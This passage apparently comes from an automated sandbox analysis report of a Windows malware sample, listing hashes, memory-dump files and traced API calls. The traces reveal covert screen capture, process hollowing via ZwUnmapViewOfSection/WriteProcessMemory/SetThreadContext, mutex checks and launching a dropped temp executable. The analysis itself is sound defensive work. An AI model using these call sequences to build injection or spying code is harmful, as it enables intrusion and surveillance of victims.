                                                  • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                  • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                  • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                  • Opcode Fuzzy Hash: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                  • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                  • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                  • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                  • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                  • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                  • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                  • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                                                  • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                  • Opcode Fuzzy Hash: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                                                  • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                  • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                  • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                  • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction ID: c2ccfb52f11e3b3b259396a7657262a28929e77abe156aeb413db61674ad6f9a
                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction Fuzzy Hash: EB91C8722080A319DB2D463E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D564D624
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction ID: 4bc7a19b78b3923bd294324807b23a5e70e392b11aa895e474023c0768c286cc
                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction Fuzzy Hash: 1C91B6762080A35ADB2D463AC43403FFFE15A563A1B1B979FD4F2CB2C5EE18C568D624
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction ID: 8cd81e8b6c8cb135a2d00aee0b4681899237c427d703fcd1ed6b13232f465ad6
                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction Fuzzy Hash: 439195722090A35ADB2D463D843403FFFE15E5A3A1B1B979FD4F2CB2C5EE28C5649624
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                  • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction ID: b40c52ae0115b4061fe2d1036eda9829452ee7622c5651f608d151b30f65a328
                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction Fuzzy Hash: B081C4722090A319DB2D463E843403FFFE15A563A5B1BA7AFD4F2CB2C5EE18C5649624
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                  • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                  • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                    • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                  • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                  • DeleteDC.GDI32(?), ref: 0041805D
                                                  • DeleteDC.GDI32(00000000), ref: 00418060
                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                  • GetCursorInfo.USER32(?), ref: 004180B5
                                                  • GetIconInfo.USER32(?,?), ref: 004180CB
                                                  • DeleteObject.GDI32(?), ref: 004180FA
                                                  • DeleteObject.GDI32(?), ref: 00418107
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                  • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                  • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                  • DeleteDC.GDI32(?), ref: 0041827F
                                                  • DeleteDC.GDI32(00000000), ref: 00418282
                                                  • DeleteObject.GDI32(00000000), ref: 00418285
                                                  • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                  • DeleteObject.GDI32(00000000), ref: 00418344
                                                  • GlobalFree.KERNEL32(?), ref: 0041834B
                                                  • DeleteDC.GDI32(?), ref: 0041835B
                                                  • DeleteDC.GDI32(00000000), ref: 00418366
                                                  • DeleteDC.GDI32(?), ref: 00418398
                                                  • DeleteDC.GDI32(00000000), ref: 0041839B
                                                  • DeleteObject.GDI32(?), ref: 004183A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 1352755160-865373369
                                                  • Opcode ID: 1713e221986eac5e09055e201b2983f957a8c2628f8d93144efb6ff1e3dc8593
                                                  • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                  • Opcode Fuzzy Hash: 1713e221986eac5e09055e201b2983f957a8c2628f8d93144efb6ff1e3dc8593
                                                  • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                  • ResumeThread.KERNEL32(?), ref: 00417582
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                  • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                  • GetLastError.KERNEL32 ref: 004175C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Mw$ntdll
                                                  • API String ID: 4188446516-1701449367
                                                  • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                  • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                  • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                  • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                  • ExitProcess.KERNEL32 ref: 0041151D
                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                    • Part of subcall function 0041265D: RegCloseKey.KERNELBASE(00000000), ref: 0041269D
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                  • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                  • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                    • Part of subcall function 0041B58F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                    • Part of subcall function 0041B58F: WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                    • Part of subcall function 0041B58F: CloseHandle.KERNELBASE(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                  • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                    • Part of subcall function 0041B58F: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
